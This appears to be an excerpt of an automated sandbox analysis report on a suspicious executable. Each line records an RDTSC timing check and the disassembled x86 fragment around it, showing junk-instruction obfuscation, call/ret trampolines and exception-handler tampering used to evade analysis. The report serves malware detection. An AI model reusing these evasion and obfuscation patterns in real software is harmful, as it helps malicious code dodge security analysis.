            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117D85D second address: 117D86B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117C2B7 second address: 117C2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117D86B second address: 117D870 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117F7ED second address: 117F7F7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117F52B second address: 117F53D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E55A2C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FF2E55A2C2Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 117F7F7 second address: 117F81C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF2E5514DEEh 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1180316 second address: 118031C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 118031C second address: 1180321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1182CE4 second address: 1182D2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 and di, 836Ah 0x0000000d and ebx, 61A24A19h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FF2E55A2C28h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov ebx, ecx 0x00000031 mov dword ptr [ebp+1244C063h], edi 0x00000037 push 00000000h 0x00000039 mov bl, 7Eh 0x0000003b push eax 0x0000003c push esi 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1185B82 second address: 1185B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1185B86 second address: 1185B9D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF2E55A2C2Bh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1185B9D second address: 1185BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FF2E5514DE6h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1185BAC second address: 1185C00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FF2E55A2C28h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 movsx edi, dx 0x00000025 push 00000000h 0x00000027 sub dword ptr [ebp+122D1F90h], ecx 0x0000002d push 00000000h 0x0000002f clc 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FF2E55A2C38h 0x00000038 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1182F2A second address: 1182F41 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF2E5514DECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1185DAD second address: 1185DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1182F41 second address: 1182F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1182F45 second address: 1182F4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1185DB3 second address: 1185E43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FF2E5514DE6h 0x00000009 jmp 00007FF2E5514DF0h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 call 00007FF2E5514DECh 0x00000017 mov ebx, 48FACC06h 0x0000001c pop ebx 0x0000001d push dword ptr fs:[00000000h] 0x00000024 push edi 0x00000025 pop ebx 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007FF2E5514DE8h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 mov eax, dword ptr [ebp+122D00B9h] 0x0000004d mov ebx, dword ptr [ebp+122D2A05h] 0x00000053 push FFFFFFFFh 0x00000055 pushad 0x00000056 xor bx, 9051h 0x0000005b mov dl, ADh 0x0000005d popad 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FF2E5514DF0h 0x00000068 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1187A68 second address: 1187AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jmp 00007FF2E55A2C2Eh 0x00000010 pop ebx 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FF2E55A2C28h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c jmp 00007FF2E55A2C35h 0x00000031 push 00000000h 0x00000033 or dword ptr [ebp+122D2387h], eax 0x00000039 push 00000000h 0x0000003b mov ebx, eax 0x0000003d xchg eax, esi 0x0000003e jng 00007FF2E55A2C2Ch 0x00000044 pushad 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 push edi 0x00000048 pop edi 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c pushad 0x0000004d push ecx 0x0000004e pop ecx 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 pushad 0x00000053 pushad 0x00000054 popad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1185E43 second address: 1185E49 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1185E49 second address: 1185E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1185E4F second address: 1185E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1188A09 second address: 1188A2D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF2E55A2C32h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007FF2E55A2C28h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1188A2D second address: 1188A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1188A33 second address: 1188A98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FF2E55A2C28h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 pushad 0x00000029 mov bx, si 0x0000002c sub dword ptr [ebp+122D2173h], edx 0x00000032 popad 0x00000033 push 00000000h 0x00000035 mov edi, dword ptr [ebp+122D2931h] 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FF2E55A2C2Eh 0x00000043 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1187BF6 second address: 1187BFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1187BFB second address: 1187C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007FF2E55A2C26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FF2E55A2C28h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D2A31h] 0x0000002f or ebx, 2D33E831h 0x00000035 push dword ptr fs:[00000000h] 0x0000003c mov di, FF36h 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 mov bl, FBh 0x00000049 jmp 00007FF2E55A2C33h 0x0000004e mov eax, dword ptr [ebp+122D09EDh] 0x00000054 movzx ebx, di 0x00000057 push FFFFFFFFh 0x00000059 mov ebx, dword ptr [ebp+122D29E9h] 0x0000005f jmp 00007FF2E55A2C2Dh 0x00000064 push eax 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007FF2E55A2C36h 0x0000006c rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1189B93 second address: 1189B97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1189B97 second address: 1189C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov di, CDE4h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FF2E55A2C28h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov ebx, dword ptr [ebp+122D270Eh] 0x0000002e mov ebx, dword ptr [ebp+122D2975h] 0x00000034 or edi, dword ptr [ebp+122D20DDh] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007FF2E55A2C28h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 00000015h 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 jno 00007FF2E55A2C2Ch 0x0000005c push eax 0x0000005d push ecx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FF2E55A2C30h 0x00000065 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 118AC0C second address: 118AC78 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 clc 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FF2E5514DE8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 stc 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007FF2E5514DE8h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 0000001Ch 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 jg 00007FF2E5514DECh 0x00000048 xchg eax, esi 0x00000049 pushad 0x0000004a push edx 0x0000004b push ecx 0x0000004c pop ecx 0x0000004d pop edx 0x0000004e pushad 0x0000004f je 00007FF2E5514DE6h 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 118CCB1 second address: 118CD17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FF2E55A2C26h 0x00000009 jp 00007FF2E55A2C26h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 je 00007FF2E55A2C3Dh 0x00000019 js 00007FF2E55A2C37h 0x0000001f jmp 00007FF2E55A2C31h 0x00000024 nop 0x00000025 mov edi, ecx 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007FF2E55A2C28h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov di, C1C1h 0x00000047 sbb bl, FFFFFFFCh 0x0000004a push 00000000h 0x0000004c mov ebx, 5DFAFA11h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 118CD17 second address: 118CD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF0h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 118CD2C second address: 118CD31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 118DBBC second address: 118DC12 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 mov ebx, 7CCC69DDh 0x0000000d push 00000000h 0x0000000f mov edi, dword ptr [ebp+122D2A85h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FF2E5514DE8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 jmp 00007FF2E5514DF7h 0x00000036 xchg eax, esi 0x00000037 pushad 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 118DC12 second address: 118DC38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FF2E55A2C34h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 118DC38 second address: 118DC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 118AE22 second address: 118AE2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1190C9B second address: 1190C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 118FEF1 second address: 118FEF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 118FEF5 second address: 118FEF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1198BE4 second address: 1198BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1198BEA second address: 1198C1A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007FF2E5514DE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FF2E5514DF6h 0x00000012 pushad 0x00000013 js 00007FF2E5514DE6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1198C1A second address: 1198C20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1198D89 second address: 1198D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1137B09 second address: 1137B23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C36h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 119E65D second address: 119E663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 119E663 second address: 119E667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A46F7 second address: 11A46FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A499C second address: 11A49A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF2E55A2C26h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A49A6 second address: 11A49AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A49AA second address: 11A49B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A4B25 second address: 11A4B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF2E5514DF2h 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A4B3E second address: 11A4B43 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A4CBF second address: 11A4CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E5514DF8h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A4CDB second address: 11A4CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A4CDF second address: 11A4CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1130EED second address: 1130EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 1130EF3 second address: 1130EF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A4E5C second address: 11A4E77 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnl 00007FF2E55A2C26h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF2E55A2C2Bh 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A4E77 second address: 11A4E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A4E97 second address: 11A4EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FF2E55A2C26h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A4EA6 second address: 11A4EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A4EAA second address: 11A4EB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A4EB0 second address: 11A4EB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A4EB6 second address: 11A4EBB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A4FFE second address: 11A5003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A518E second address: 11A51AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edi 0x00000007 push edx 0x00000008 jmp 00007FF2E55A2C36h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A51AE second address: 11A51B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 113CA95 second address: 113CAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 113CAA0 second address: 113CAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A985E second address: 11A986A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A9E2C second address: 11A9E47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E5514DF7h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A9E47 second address: 11A9E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a jno 00007FF2E55A2C26h 0x00000010 jng 00007FF2E55A2C26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 11A954D second address: 11A956B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
